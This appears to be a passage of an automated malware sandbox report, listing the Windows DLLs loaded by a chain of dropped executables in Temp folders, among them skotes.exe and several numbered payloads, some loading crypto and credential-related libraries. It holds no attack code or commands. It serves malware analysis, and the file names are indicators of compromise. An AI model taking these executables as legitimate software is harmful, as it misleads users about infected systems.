                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeSection loaded: feclient.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeSection loaded: advpack.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeSection loaded: feclient.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeSection loaded: advpack.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: mstask.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: dui70.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: duser.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: chartv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: oleacc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: atlthunk.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: explorerframe.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: webio.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: mozglue.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: vcruntime140.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: msvcp140.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: vcruntime140.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: aclayers.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: sfc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: sfc_os.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: webio.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: schannel.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: mskeyprotect.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: ncryptsslp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: gpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: dpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: amsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: aclayers.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: sfc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: sfc_os.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: napinsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: pnrpnsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: wshbth.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: nlaapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: winrnr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: windowscodecs.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: napinsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: pnrpnsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: wshbth.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: nlaapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: winrnr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: rstrtmgr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: dpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: dlnashext.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeSection loaded: wpdshext.dll
